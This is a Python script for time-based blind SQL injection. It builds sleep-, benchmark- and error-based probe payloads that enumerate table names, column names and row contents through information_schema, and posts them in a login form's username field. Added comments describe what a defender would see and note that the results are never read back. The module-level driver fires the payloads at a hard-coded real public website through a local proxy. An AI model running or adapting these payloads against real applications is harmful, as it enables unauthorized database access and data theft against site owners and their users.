#!/usr/bin/python3
#coding:utf-8
import string
import requests
import time
import hackhttp
from urllib.parse import quote,unquote
# Short module-level aliases for the character sets the probes iterate over.
asciiLetters, hexdigits, digits, printable = (
    string.ascii_letters,
    string.hexdigits,
    string.digits,
    string.printable,
)
class log():
    """Minimal coloured console logger used throughout this script.

    Every method prints one line of the form ``[<tag>] <message>`` to
    stdout, where ``<tag>`` is the ANSI-coloured marker from ``colorTable``.
    ``debug`` prints only while the module-level ``DEBUG`` flag is truthy.
    """
    # Declares DEBUG global for the class body only; debug() below resolves
    # DEBUG as a module global at call time regardless of this line.
    global DEBUG
    colorTable = {
        "success": "\033[1;32m+\033[0m",
        "error": "\033[1;31m!\033[0m",
        "info": "\033[1;34m*\033[0m",
        "debug": "\033[1;31mDEBUG\033[0m",
    }

    @staticmethod
    def _emit(level, string):
        """Print *string* prefixed with the colorTable marker for *level*."""
        print("[{}] {}".format(log.colorTable[level], string))

    @staticmethod
    def success(string):
        """Print *string* with the green ``+`` marker."""
        log._emit("success", string)

    @staticmethod
    def error(string):
        """Print *string* with the red ``!`` marker."""
        log._emit("error", string)

    @staticmethod
    def info(string):
        """Print *string* with the blue ``*`` marker."""
        log._emit("info", string)

    @staticmethod
    def debug(string):
        """Print *string* with the DEBUG marker, only when ``DEBUG`` is truthy."""
        if DEBUG:
            log._emit("debug", string)
# global set
DEBUG = True  # read by log.debug() at call time; True prints every generated condition

# Character-probe templates. ``{content}`` is an inner SELECT, ``{index}`` the
# position handed to substr, ``{value}`` the candidate character (index1) or
# its ordinal (index2). Only index2 is referenced in this file.
index1 = "select substr(({content}),{index},1) = '{value}'"
index2 = "select ascii(substr(({content}),{index},1)) = {value}"

# Wrappers that give a true probe an observable side effect: a call presumably
# chosen to raise a database error (exp(800)), a fixed 5-second delay (sleep),
# or a CPU-bound delay (benchmark). Only sleepCondition1 is referenced in this
# file. These literal tokens are what appears in request bodies and in the
# database query log while the tool runs -- the natural thing for a detection
# rule to key on.
errorCondition = "if(({content}),exp(800),0)"
sleepCondition1 = "if(({content}),sleep(5),0)"
sleepCondition2 = "if(({content}),benchmark(20000000,md5(1)),0)"
class SqlInject():
    """Generators of time-based blind SQL-injection probe conditions.

    Each ``read*`` method is a generator that yields one SQL condition per
    (character position, candidate character) pair, built from the
    module-level ``index2`` (ascii/substr comparison) and ``sleepCondition1``
    (``sleep(5)`` wrapper) templates. The generators only build strings;
    ``sendRequest`` is the one place that puts them on the wire, inside the
    ``username`` field of a form POST. No method here reads responses or
    timings back, so nothing in this class decodes a result.

    Defender's view: the strings produced here are exactly what shows up in a
    request body and in the database query log when this tool runs
    (``sleep(5)``, ``information_schema.tables``, ``group_concat``), and the
    precondition for any of them to matter is an application that
    concatenates the ``username`` value into SQL instead of binding it as a
    query parameter.
    """

    def __init__(self):
        # No state is kept; every method takes what it needs as arguments.
        pass

    def readTableName(self,length):
        """Yield one probe condition per (position, letter) pair of the
        comma-joined table list of the current database.

        Args:
            length: number of positions to probe; 0..length-1 is passed
                straight through as the substr index.

        Yields:
            str: a ``sleepCondition1``-wrapped ``index2`` condition.
        """
        getTableName = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Candidate alphabet: letters plus the group_concat separator.
        strTable = asciiLetters + ","
        for i in range(length):
            for j in strTable:
                index = index2.format( content = getTableName,index = i,value=ord(j))
                condition = sleepCondition1.format( content = index)
                log.debug(condition)  # printed for every candidate while DEBUG is on
                yield condition

    def readColumnName(self,length,table):
        """Yield one probe condition per (position, letter) pair of the
        comma-joined column list of *table* in the current database.

        Args:
            length: number of positions to probe (substr index 0..length-1).
            table: table name interpolated verbatim into the inner SELECT.

        Yields:
            str: a ``sleepCondition1``-wrapped ``index2`` condition.
        """
        getColumnName = "select group_concat(COLUMN_NAME) from COLUMNS where table_name='{table}' and table_schema=database()"
        strTable = asciiLetters + ","
        for i in range(length):
            for j in strTable:
                # Re-formatted on every iteration although it depends on
                # neither i nor j.
                getColumnNameReal = getColumnName.format( table = table)
                index = index2.format( content = getColumnNameReal,index = i,value=ord(j))
                condition = sleepCondition1.format( content = index)
                log.debug(condition)
                yield condition

    def readContent(self,start,end,line,table,column):
        """Yield one probe condition per (position, printable char) pair of
        a single cell: row *line* of *column* in *table*.

        Args:
            start, end: half-open range of substr positions to probe.
            line: zero-based row offset used in ``limit {line},1``.
            table, column: interpolated verbatim into the inner SELECT.

        Yields:
            str: a ``sleepCondition1``-wrapped ``index2`` condition.
        """
        # Wider alphabet than the name readers: all of string.printable.
        strTable = printable
        getContent1 = "select {column} from {table} limit {line},1"
        getContent2 = "select group_concat({column}) from {table}"  # unused here
        for i in range(start,end):
            for j in strTable:
                getContent = getContent1.format( column=column , table=table,line=line)
                index = index2.format( content = getContent,index = i,value=ord(j))
                condition = sleepCondition1.format( content = index)
                log.debug(condition)
                yield condition

    def sendRequest(self,url,proxy=None):
        """POST each ``readTableName(30)`` condition to *url* and log the exchange.

        Uses the third-party ``hackhttp`` client rather than the imported
        ``requests``. The response tuple (code, head, body, redirect, logs)
        is unpacked but never inspected and no elapsed time is measured, so
        the outcome of every probe is discarded.

        Args:
            url: target URL for the form POST.
            proxy: optional proxy handed to hackhttp (a (host, port) tuple as
                passed at module level); when set, the request as actually
                sent (``logs["request"]``) is also printed.

        Returns:
            None.
        """
        hh = hackhttp.hackhttp()
        for payload in self.readTableName(30):
            # The probe rides in the ``username`` form field; the password
            # value is a fixed filler.
            data = "username=' and {p}--+&password=123456".format(p=payload)
            if proxy:
                log.debug(data)
                code, head, body, redirect, logs = hh.http(url,post=data,proxy=proxy)
                log.debug(logs["request"])
            else:
                code, head, body, redirect, logs = hh.http(url,post=data)
                log.debug(data)
# Module-level driver: constructing the object and calling sendRequest happen
# at import time (there is no ``if __name__ == "__main__":`` guard), against a
# URL and a (host, port) proxy tuple that are hard-coded here rather than
# taken from arguments.
sqlInject = SqlInject()
sqlInject.sendRequest("http://www.baidu.com/",("127.0.0.1",8080))